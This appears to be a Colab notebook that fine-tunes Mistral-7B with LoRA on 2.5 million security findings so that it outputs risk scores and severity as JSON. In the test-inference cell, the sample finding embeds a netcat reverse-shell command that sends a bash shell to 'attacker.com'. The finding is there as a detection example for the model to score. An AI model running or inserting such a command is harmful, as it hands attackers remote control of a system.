# Sys-Scan Security Model - TPU Fine-Tuning on Massive Dataset

**Runtime**: TPU v3-8 or v4-8  
**Dataset**: 2.5M security findings with LangChain correlations  
**Model**: Clean Mistral-7B-Instruct-v0.3 → Fine-tuned security analyst

## Setup Instructions

1. **Runtime**: Runtime → Change runtime type → TPU
2. **Dataset**: Upload `massive_datasets.tar.gz` to Google Drive (`/content/drive/MyDrive/sys-scan/`)
3. **Execute**: Run all cells
4. **Output**: Model saved to Drive (`/content/drive/MyDrive/sys-scan/models/mistral-security-final/`)

## 1. Environment Setup

In [None]:
# Check TPU availability
import os
import sys

# Check for TPU
try:
    import torch_xla
    import torch_xla.core.xla_model as xm
    print(f"✓ TPU detected: {xm.xla_device()}")
    print(f"✓ TPU cores: {xm.xrt_world_size()}")
    USE_TPU = True
except ImportError:
    print("⚠️  No TPU detected - will use GPU/CPU")
    USE_TPU = False

In [None]:
# Install dependencies
%%bash
pip install -q transformers==4.36.0 datasets==2.15.0 accelerate==0.25.0
pip install -q peft==0.7.0 trl==0.7.9 sentencepiece protobuf
pip install -q bitsandbytes==0.41.3  # For GPU fallback

# TPU-specific (if on TPU)
if [ "$COLAB_TPU_ADDR" ]; then
  pip install -q cloud-tpu-client==0.10 torch-xla==2.1.0
fi

echo "✓ Dependencies installed"

In [None]:
# Imports
import torch
import json
import tarfile
import logging
from pathlib import Path
from datetime import datetime
from typing import Iterator, Dict, Any

import transformers
from transformers import (
    AutoTokenizer,
    AutoModelForCausalLM,
    TrainingArguments,
    DataCollatorForLanguageModeling
)
from datasets import Dataset, IterableDataset
from peft import LoraConfig, get_peft_model, prepare_model_for_kbit_training
from trl import SFTTrainer, DataCollatorForCompletionOnlyLM

if USE_TPU:
    import torch_xla.core.xla_model as xm
    import torch_xla.distributed.parallel_loader as pl

# Logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)

print(f"PyTorch: {torch.__version__}")
print(f"Transformers: {transformers.__version__}")

## 2. Mount Google Drive

In [None]:
from google.colab import drive
drive.mount('/content/drive')

# Setup paths
DRIVE_ROOT = Path('/content/drive/MyDrive/sys-scan')
DATASET_PATH = DRIVE_ROOT / 'massive_datasets.tar.gz'
OUTPUT_DIR = DRIVE_ROOT / 'models' / 'mistral-security-final'
CACHE_DIR = Path('/content/cache')
WORK_DIR = Path('/content/workspace')

# Create directories
OUTPUT_DIR.mkdir(parents=True, exist_ok=True)
CACHE_DIR.mkdir(parents=True, exist_ok=True)
WORK_DIR.mkdir(parents=True, exist_ok=True)

print(f"✓ Drive mounted")
print(f"  Dataset: {DATASET_PATH}")
print(f"  Output: {OUTPUT_DIR}")
print(f"  Dataset exists: {DATASET_PATH.exists()}")

## 3. Extract and Prepare Massive Dataset

In [None]:
# Extract dataset
print("Extracting massive dataset...")
EXTRACTED_DIR = WORK_DIR / 'massive_datasets'

if not EXTRACTED_DIR.exists():
    with tarfile.open(DATASET_PATH, 'r:gz') as tar:
        tar.extractall(WORK_DIR)
    print(f"✓ Extracted to {EXTRACTED_DIR}")
else:
    print(f"✓ Already extracted: {EXTRACTED_DIR}")

# List dataset files
dataset_files = sorted(list(EXTRACTED_DIR.glob('*.json')))
print(f"\nFound {len(dataset_files)} dataset files")
for f in dataset_files[:5]:
    size_mb = f.stat().st_size / 1024 / 1024
    print(f"  {f.name}: {size_mb:.1f} MB")
if len(dataset_files) > 5:
    print(f"  ... and {len(dataset_files) - 5} more")

## 4. Streaming Data Loader for 2.5M Findings

In [None]:
class MassiveSecurityDataset:
    """Streaming dataset loader for massive security findings."""
    
    SYSTEM_PROMPT = """You are a security analysis AI embedded in sys-scan-graph. Analyze security findings and provide risk scoring, correlations, and remediation recommendations. Output valid JSON."""
    
    def __init__(self, data_files: list, max_examples: int = None):
        self.data_files = data_files
        self.max_examples = max_examples
        
    def _create_training_example(self, finding: Dict[str, Any]) -> str:
        """Convert finding to instruction-following format."""
        # Input: minimal finding info
        input_data = {
            "id": finding.get("id"),
            "title": finding.get("title"),
            "description": finding.get("description"),
            "metadata": finding.get("metadata", {}),
            "category": finding.get("category")
        }
        
        # Output: enriched analysis
        output_data = {
            "risk_score": finding.get("risk_score"),
            "severity": finding.get("severity"),
            "risk_subscores": finding.get("risk_subscores"),
            "probability_actionable": finding.get("probability_actionable"),
            "baseline_status": finding.get("baseline_status"),
            "tags": finding.get("tags", []),
            "rationale": finding.get("rationale")
        }
        
        instruction = "Analyze this security finding and provide risk scoring with subscores (impact, exposure, anomaly, confidence), severity classification, and actionability assessment."
        
        # Mistral-Instruct format
        text = f"""<s>[INST] {self.SYSTEM_PROMPT} [/INST]
[INST] {instruction}

Input:
{json.dumps(input_data, indent=2)}
[/INST]
{json.dumps(output_data, indent=2)}</s>"""
        
        return text
    
    def stream_examples(self) -> Iterator[Dict[str, str]]:
        """Stream training examples from all files."""
        count = 0
        
        for file_path in self.data_files:
            logger.info(f"Loading {file_path.name}...")
            
            with open(file_path) as f:
                data = json.load(f)
            
            # Handle nested structure
            if 'data' in data:
                findings_data = data['data']
            else:
                findings_data = data
            
            # Extract all findings
            findings_by_category = findings_data.get('findings', {})
            
            for category, severity_groups in findings_by_category.items():
                if not isinstance(severity_groups, dict):
                    continue
                    
                for severity, findings_list in severity_groups.items():
                    if not isinstance(findings_list, list):
                        continue
                    
                    for finding in findings_list:
                        if self.max_examples and count >= self.max_examples:
                            return
                        
                        try:
                            text = self._create_training_example(finding)
                            yield {"text": text}
                            count += 1
                            
                            if count % 10000 == 0:
                                logger.info(f"Streamed {count:,} examples...")
                        except Exception as e:
                            logger.warning(f"Skipping finding {finding.get('id')}: {e}")
                            continue
        
        logger.info(f"✓ Streamed {count:,} total examples")

# Test streaming
dataset_loader = MassiveSecurityDataset(dataset_files, max_examples=10)
sample = next(dataset_loader.stream_examples())
print("\nSample training example:")
print(sample['text'][:500] + "...")

## 5. Configuration

In [None]:
# Training configuration optimized for TPU
CONFIG = {
    # Model
    "model_name": "mistralai/Mistral-7B-Instruct-v0.3",
    
    # Data
    "max_examples": None,  # Use all 2.5M (set to smaller number for testing)
    "train_split": 0.95,   # 95% train, 5% eval
    "max_seq_length": 2048,
    
    # LoRA
    "lora_r": 128,          # Higher rank for massive dataset
    "lora_alpha": 256,
    "lora_dropout": 0.05,
    "lora_targets": ["q_proj", "k_proj", "v_proj", "o_proj", 
                     "gate_proj", "up_proj", "down_proj"],
    
    # Training - TPU optimized
    "num_epochs": 3,
    "per_device_batch_size": 16 if USE_TPU else 4,  # TPU can handle larger batches
    "gradient_accumulation": 2 if USE_TPU else 4,
    "learning_rate": 2e-4,
    "weight_decay": 0.01,
    "warmup_ratio": 0.03,
    "max_grad_norm": 1.0,
    
    # Precision
    "bf16": True,  # BF16 for TPU, FP16 for GPU
    "fp16": False,
    
    # Logging & Saving
    "logging_steps": 100,
    "eval_steps": 5000,
    "save_steps": 5000,
    "save_total_limit": 3,
    
    # Optimization
    "gradient_checkpointing": True,
    "optim": "adafactor" if USE_TPU else "paged_adamw_8bit",
}

# Effective batch size
effective_batch = CONFIG["per_device_batch_size"] * CONFIG["gradient_accumulation"]
if USE_TPU:
    effective_batch *= 8  # 8 TPU cores

print("Training Configuration:")
print(json.dumps(CONFIG, indent=2))
print(f"\nEffective batch size: {effective_batch}")
print(f"Total training steps: ~{(2_500_000 * CONFIG['num_epochs']) // effective_batch:,}")

## 6. Load Model and Tokenizer

In [None]:
# Load tokenizer
print("Loading tokenizer...")
tokenizer = AutoTokenizer.from_pretrained(
    CONFIG["model_name"],
    cache_dir=str(CACHE_DIR),
    trust_remote_code=True
)

# Set padding token
if tokenizer.pad_token is None:
    tokenizer.pad_token = tokenizer.eos_token
    tokenizer.pad_token_id = tokenizer.eos_token_id

print(f"✓ Tokenizer loaded (vocab: {len(tokenizer):,})")

# Load model
print("\nLoading model (this may take a few minutes)...")

if USE_TPU:
    # TPU: Load in BF16
    model = AutoModelForCausalLM.from_pretrained(
        CONFIG["model_name"],
        cache_dir=str(CACHE_DIR),
        torch_dtype=torch.bfloat16,
        trust_remote_code=True
    )
else:
    # GPU: Load with 4-bit quantization
    from transformers import BitsAndBytesConfig
    
    bnb_config = BitsAndBytesConfig(
        load_in_4bit=True,
        bnb_4bit_quant_type="nf4",
        bnb_4bit_compute_dtype=torch.bfloat16,
        bnb_4bit_use_double_quant=True,
    )
    
    model = AutoModelForCausalLM.from_pretrained(
        CONFIG["model_name"],
        quantization_config=bnb_config,
        device_map="auto",
        cache_dir=str(CACHE_DIR),
        trust_remote_code=True
    )
    model = prepare_model_for_kbit_training(model, use_gradient_checkpointing=True)

print(f"✓ Model loaded")

# Apply LoRA
print("\nApplying LoRA adapters...")
peft_config = LoraConfig(
    r=CONFIG["lora_r"],
    lora_alpha=CONFIG["lora_alpha"],
    lora_dropout=CONFIG["lora_dropout"],
    target_modules=CONFIG["lora_targets"],
    bias="none",
    task_type="CAUSAL_LM",
)

model = get_peft_model(model, peft_config)
model.print_trainable_parameters()

print("✓ LoRA applied")

## 7. Prepare Datasets

In [None]:
# Create streaming dataset
print("Creating streaming dataset...")

dataset_loader = MassiveSecurityDataset(
    dataset_files,
    max_examples=CONFIG["max_examples"]
)

# Create iterable dataset for efficient streaming
def gen():
    for example in dataset_loader.stream_examples():
        yield example

# Use IterableDataset for memory-efficient streaming
from datasets import Dataset
import random

# For massive datasets, we'll use IterableDataset
# But for proper train/eval split, let's load into memory once
# (2.5M examples * ~1KB each = ~2.5GB, manageable)

print("Loading all examples into memory for splitting...")
all_examples = list(dataset_loader.stream_examples())
print(f"✓ Loaded {len(all_examples):,} examples")

# Shuffle and split
random.seed(42)
random.shuffle(all_examples)

split_idx = int(len(all_examples) * CONFIG["train_split"])
train_examples = all_examples[:split_idx]
eval_examples = all_examples[split_idx:]

# Create datasets
train_dataset = Dataset.from_list(train_examples)
eval_dataset = Dataset.from_list(eval_examples)

print(f"\n✓ Dataset split:")
print(f"  Train: {len(train_dataset):,} examples")
print(f"  Eval: {len(eval_dataset):,} examples")

## 8. Training Setup

In [None]:
# Training arguments
training_args = TrainingArguments(
    output_dir=str(OUTPUT_DIR),
    num_train_epochs=CONFIG["num_epochs"],
    per_device_train_batch_size=CONFIG["per_device_batch_size"],
    per_device_eval_batch_size=CONFIG["per_device_batch_size"],
    gradient_accumulation_steps=CONFIG["gradient_accumulation"],
    learning_rate=CONFIG["learning_rate"],
    weight_decay=CONFIG["weight_decay"],
    warmup_ratio=CONFIG["warmup_ratio"],
    max_grad_norm=CONFIG["max_grad_norm"],
    bf16=CONFIG["bf16"],
    fp16=CONFIG["fp16"],
    logging_steps=CONFIG["logging_steps"],
    evaluation_strategy="steps",
    eval_steps=CONFIG["eval_steps"],
    save_strategy="steps",
    save_steps=CONFIG["save_steps"],
    save_total_limit=CONFIG["save_total_limit"],
    load_best_model_at_end=True,
    metric_for_best_model="eval_loss",
    greater_is_better=False,
    optim=CONFIG["optim"],
    gradient_checkpointing=CONFIG["gradient_checkpointing"],
    report_to=["tensorboard"],
    logging_dir=str(OUTPUT_DIR / "logs"),
    seed=42,
)

# Data collator - only compute loss on assistant responses
response_template = "[/INST]"
collator = DataCollatorForCompletionOnlyLM(
    response_template=response_template,
    tokenizer=tokenizer,
    mlm=False
)

# Create trainer
trainer = SFTTrainer(
    model=model,
    args=training_args,
    train_dataset=train_dataset,
    eval_dataset=eval_dataset,
    tokenizer=tokenizer,
    dataset_text_field="text",
    max_seq_length=CONFIG["max_seq_length"],
    data_collator=collator,
    packing=False,
)

print("✓ Trainer initialized")

## 9. Train Model

In [None]:
# Start training
print("="*80)
print("STARTING TRAINING")
print("="*80)
print(f"Training on {len(train_dataset):,} examples")
print(f"Evaluating on {len(eval_dataset):,} examples")
print(f"Total epochs: {CONFIG['num_epochs']}")
print(f"Effective batch size: {effective_batch}")
print("="*80)

start_time = datetime.now()
print(f"Start time: {start_time}\n")

# Train
trainer.train()

end_time = datetime.now()
duration = end_time - start_time

print("\n" + "="*80)
print("TRAINING COMPLETED")
print("="*80)
print(f"End time: {end_time}")
print(f"Duration: {duration}")
print("="*80)

## 10. Final Evaluation

In [None]:
# Final evaluation
print("Running final evaluation...")
eval_results = trainer.evaluate()

print("\nEvaluation Results:")
for key, value in eval_results.items():
    print(f"  {key}: {value:.4f}")

# Save results
with open(OUTPUT_DIR / "eval_results.json", "w") as f:
    json.dump(eval_results, f, indent=2)

print(f"\n✓ Results saved to {OUTPUT_DIR / 'eval_results.json'}")

## 11. Save Final Model to Google Drive

In [None]:
# Save model and tokenizer
print(f"Saving final model to Google Drive...")
print(f"Location: {OUTPUT_DIR}")

trainer.save_model(str(OUTPUT_DIR))
tokenizer.save_pretrained(str(OUTPUT_DIR))

# Save training config
with open(OUTPUT_DIR / "training_config.json", "w") as f:
    json.dump(CONFIG, f, indent=2)

# Save training summary
summary = {
    "start_time": start_time.isoformat(),
    "end_time": end_time.isoformat(),
    "duration_seconds": duration.total_seconds(),
    "train_examples": len(train_dataset),
    "eval_examples": len(eval_dataset),
    "final_eval_loss": eval_results.get("eval_loss"),
    "use_tpu": USE_TPU,
}

with open(OUTPUT_DIR / "training_summary.json", "w") as f:
    json.dump(summary, f, indent=2)

print("\n✓ Model saved successfully!")
print("\nSaved files:")
for f in sorted(OUTPUT_DIR.glob("*")):
    if f.is_file():
        size_mb = f.stat().st_size / 1024 / 1024
        print(f"  {f.name}: {size_mb:.1f} MB")

## 12. Test Inference

In [None]:
# Test the trained model
test_finding = {
    "id": "test_001",
    "title": "Suspicious process execution",
    "description": "Process /usr/bin/python3 executing with unusual command line arguments",
    "metadata": {
        "pid": 12345,
        "command": "/usr/bin/python3 -c 'import os; os.system(\"nc -e /bin/bash attacker.com 4444\")'",
        "user": "www-data",
        "ppid": 1000
    },
    "category": "processes"
}

prompt = f"""<s>[INST] You are a security analysis AI. Analyze security findings and provide risk scoring. [/INST]
[INST] Analyze this security finding and provide risk scoring with subscores (impact, exposure, anomaly, confidence), severity classification, and actionability assessment.

Input:
{json.dumps(test_finding, indent=2)}
[/INST]
"""

# Move model to appropriate device for inference
if USE_TPU:
    device = xm.xla_device()
else:
    device = model.device

inputs = tokenizer(prompt, return_tensors="pt").to(device)

print("Generating response...")
with torch.no_grad():
    outputs = model.generate(
        **inputs,
        max_new_tokens=512,
        temperature=0.7,
        do_sample=True,
        pad_token_id=tokenizer.eos_token_id
    )

response = tokenizer.decode(outputs[0], skip_special_tokens=True)

print("\n" + "="*80)
print("MODEL RESPONSE:")
print("="*80)
print(response)
print("="*80)

## Summary

✓ Model trained on 2.5M security findings  
✓ Saved to Google Drive: `/content/drive/MyDrive/sys-scan/models/mistral-security-final/`  
✓ Ready for deployment in sys-scan-graph

### Next Steps

1. Download model from Google Drive
2. Integrate with sys-scan-graph agent
3. Test on real security scans
4. Monitor performance and iterate